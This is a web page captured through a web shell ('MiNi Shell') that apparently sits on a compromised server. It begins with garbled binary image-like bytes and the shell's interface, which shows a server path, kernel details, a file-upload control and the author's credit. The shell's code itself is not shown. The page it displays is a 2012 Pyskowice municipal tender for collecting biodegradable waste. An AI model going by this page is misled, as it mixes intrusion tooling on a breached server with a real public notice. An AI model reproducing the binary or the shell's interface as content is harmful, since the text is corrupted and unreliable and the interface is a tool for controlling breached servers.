JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120223/44049-N-2012.html

<p class="kh_header"><b>Pyskowice: SELEKTYWNA ZBIÓRKA ODPADÓW BIODEGRADOWALNYCH</b><br>
<b>Numer ogłoszenia: 44049 - 2012; data zamieszczenia: 23.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyskowice , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, woj. śląskie, tel. 32 3326000, faks 32 3326002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pyskowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SELEKTYWNA ZBIÓRKA ODPADÓW BIODEGRADOWALNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Poinformowanie  mieszkańców  o  harmonogramie  odbioru  odpadów  biodegradowalnych  w  2012r.
2.Odbiór  wg  harmonogramu  (zał.  nr  6  do  SIWZ)  odpadów  biodegradowalnych  z  525  sztuk  pojemników  o  pojemności  240L  od  mieszkańców  z  zabudowy  jednorodzinnej  na  terenie  Gminy  Pyskowice  w  I  półroczu  br.  W  II  półroczu  br. liczba  pojemników  ulegnie  zwiększeniu  o  nie  więcej  niż  134  sztuki  pojemników  o  których  mowa  w  pkt.  3.
3.Dostarczenie  mieszkańcom  nie  więcej  niż  134  sztuk  nowo  zakupionych  pojemników  o  pojemności  240L  przeznaczonych  do  selektywnej  zbiórki  odpadów  biodegradowalnych.
4.Dystrybucja  worków  o  pojemności  120L  przeznaczonych  do  gromadzenia  odpadów  biodegradowalnych  wśród  zainteresowanych  mieszkańców,  którzy  już  posiadają  pojemniki  na  odbiór  odpadów  BIO  (mają  zawarte  odpowiednie  umowy  z  Gminą  Pyskowice).  
5.Odbiór  od  zainteresowanych  mieszkańców  w  miejscu  ich  zamieszkania,  odpadów  biodegradowalnych  zgromadzonych  w  workach  o  pojemności  120L,  w  terminach  wskazanych  w  harmonogramie  oraz  w  każdym  terminie  w  godzinach  od  700  do  1500  w  oznaczonym  miejscu  na  terenie  Gminy  Pyskowice  (punkt  odbioru),  gdzie  mieszkańcy  będą  mogli  sami  dostarczyć  worki  ze  zbieranymi  selektywnie  odpadami  biodegradowalnymi;  liczba  worków  nie  większa  niż  1600  sztuk  ogółem.

Obowiązki  Wykonawcy:
6.Wykonawca  zobowiązuje  się  do  wykonania  prac  zgodnie  z  ustalonym    harmonogramem,  dystrybucji  worków  wśród  zainteresowanych  mieszkańców  oraz  ich  odbioru  w  miejscu  zamieszkania  lub  w  oznaczonym  punkcie  na  terenie  Gminy.
7.Miejsce  po  wywożeniu  odpadów  Wykonawca  pozostawi  czyste  i  uprzątnięte.
8.Wykonawca  od  momentu  odbioru  odpadów  ponosi  wszelką  odpowiedzialność  za  ich  magazynowanie (tymczasowe  przechowywanie),  ponosi  opłaty  na  rzecz  ochrony  środowiska  zgodnie  z  ustawą  o  odpadach  i  innymi  obowiązującymi  przepisami.
9.Wykonawca  przekaże  zebrane  odpady  do  Zakładu  Przetwarzania  Odpadów  Komunalnych  w  Pyskowicach  przy  ul.  Wrzosowej  20a..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  w  przypadku  dysponowania  dodatkowymi  środkami  finansowymi  przewiduje  udzielenie  zamówienia  uzupełniającego  określonego  w  art.  67  ust.  1  pkt  6  Ustawy  Prawo  Zamówień  Publicznych  do  50%  zamówienia  podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  ubiegający  się  o  zamówienie  muszą:
a)posiadać  zezwolenie  na  prowadzenie  działalności  w  zakresie  zbierania  i  
transportu  odpadów  o  kodach:  20 02 01 - odpady  ulegające  biodegradacji  wydane  na  podstawie  ustawy  z  dnia  27.04.2001r. o odpadach  (t.j.  Dz.  U.  z  2007r,  nr  39,  poz.  251  z  póź.  zm.),
b)posiadać  zezwolenie  na  odbieranie  odpadów  o  kodach  20 02 01  wydane  na  podstawie  ustawy  z  dnia  13.09.1996r.  o  utrzymaniu  czystości  i  porządku  w  gminach  (t.j.  Dz.  U.  z  2005r.,  nr  236,  poz.  2008  z  póź.  zm.),
c)posiadać  zgodę  na  zbieranie  (magazynowanie)  odpadów  o  kodach  20 02 01   na  terenie  Gminy  Pyskowice.
Warunki  udziału  w  postępowaniu  będą  oceniane  na  podstawie  dokumentów  i  oświadczeń  wymienionych  w  pkt.  VII  SIWZ wg  formuły  spełnia/nie  spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać  wykonanie w ciągu ostatnich trzech lat przynajmniej 1 usługi,  a  w  przypadku  świadczeń  okresowych  lub  ciągłych  wykonywanie  jednej  usługi  w  zakresie  niezbędnym  do  wykazania  spełnienia  warunków  wiedzy  i  doświadczenia  o  wartości  nie  mniejszej  niż  80.000,00 zł  brutto.
Warunki  udziału  w  postępowaniu  będą  oceniane  na  podstawie  dokumentów  i  oświadczeń  wymienionych  w  pkt.  VII  SIWZ wg  formuły  spełnia/nie  spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać odpowiedni sprzęt do wykonywania przedmiotu umowy tj. minimum:
- śmieciarki  bezpylne  				                              2  sztuki,
- samochód samowyładowczy do  3,5 t. lub ciągnik z przyczepą           1 sztuka,
Warunki  udziału  w  postępowaniu  będą  oceniane  na  podstawie  dokumentów  i  oświadczeń  wymienionych  w  pkt.  VII  SIWZ wg  formuły  spełnia/nie  spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca,  który  będzie  polegał  na  wiedzy  i  doświadczeniu,  potencjale  technicznym,  osobach  zdolnych  do  wykonywania  zamówienia  lub  zdolnościach  finansowych  innych  podmiotów  zobowiązany  jest  udowodnić  Zamawiającemu,  iż  będzie  dysponował  zasobami  niezbędnymi  do  realizacji  zamówienia.
Warunki  udziału  w  postępowaniu  będą  oceniane  na  podstawie  dokumentów  i  oświadczeń  wymienionych  w  pkt.  VII  SIWZ wg  formuły  spełnia/nie  spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać  opłaconą  polisę  ubezpieczeniową,  a  w  przypadku  jej  braku  inny  dokument  potwierdzający,  że  Wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia  na  kwotę  min. 100.000,00 zł.  Wykonawca  wraz  z  dokumentem  ubezpieczenia  winien  złożyć  potwierdzenie  zapłaty  składki  (o  ile  wpłata  nie  została  potwierdzona  w  polisie)  lub  w  przypadku  rozłożenia  na  raty - potwierdzenie  wpłaty  wszystkich  dotychczasowych  składek,
Warunki  udziału  w  postępowaniu  będą  oceniane  na  podstawie  dokumentów  i  oświadczeń  wymienionych  w  pkt.  VII  SIWZ wg  formuły  spełnia/nie  spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo w przypadku podmiotów występujących wspólnie (dot. również spółek cywilnych).
2.Jeżeli  Wykonawca  wykazuje  spełnienie  warunków  udziału  w  postępowaniu,  polega  na  zasobach  innych  podmiotów,  winien  załączyć  pisemne  zobowiązanie  tych  podmiotów  do  oddania  mu  niezbędnych  zasobów  na  okres  korzystania  z  nich  przy  wykonywaniu  przedmiotowego  zamówienia.
3.Jeżeli  Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium  Rzeczpospolitej  Polskiej  przedkłada  dokument  wystawiony  w  kraju,  w  którym  ma  siedzibę  lub  miejsce  zamieszkania  potwierdzający,  że:
nie  otwarto  jego  likwidacji  ani  nie  ogłoszono  upadłości - wystawiony  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert,
nie  zalega  z  uiszczeniem  podatków,  opłat,  składek  na  ubezpieczenie  społeczne  i  zdrowotne  albo,  że  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu - wystawiony  nie  wcześniej  niż  3 miesiące  przed  upływem  terminu  składania  ofert.
4.Dokumenty  sporządzone  w  języku  obcym  muszą  być  złożone  wraz  z  tłumaczeniami  na  język  polski.
5.Dokumenty przedłożone w formie kopii winny być potwierdzone wraz z pieczątką imienną za zgodność z oryginałem przez uprawnionego przedstawiciela wykonawcy. Uprawnienie do podpisywania powinno być dołączone, o ile nie wynika to z innych  dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, w następujących  przypadkach:
a)zmiany  przepisów  prawa,  które  mogą  mieć  wpływ  na  realizację  zamówienia,
b)zmiana  osoby  uprawnionej  do  realizacji  umowy  zarówno  ze  strony  Zamawiającego  jak  i  Wykonawcy  następuje  po  pisemnym  poinformowaniu  drugiej  Strony  i  nie  wymaga  aneksu  do  umowy.
c)gdy  Zakład  Przetwarzania  Odpadów  Komunalnych  w  Pyskowicach  przy  ul.  Wrzosowej  20a  nie  będzie  spełniał  wymogów  regionalnej  instalacji  do  przetwarzania  odpadów,  wówczas  strony  ustalą  inny  właściwy  podmiot  uprawniony  do  przetwarzania  odpadów  spełniający  kryteria  wymagane  przez  prawo.
2.Zmiany  umowy  wymagają  aneksu  pod  rygorem  nieważności  z  zastrzeżeniem  ust.  1  pkt. b.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pyskowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 Pyskowice, pokój nr 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 10:30, miejsce: Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 Pyskowice, pokój nr 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com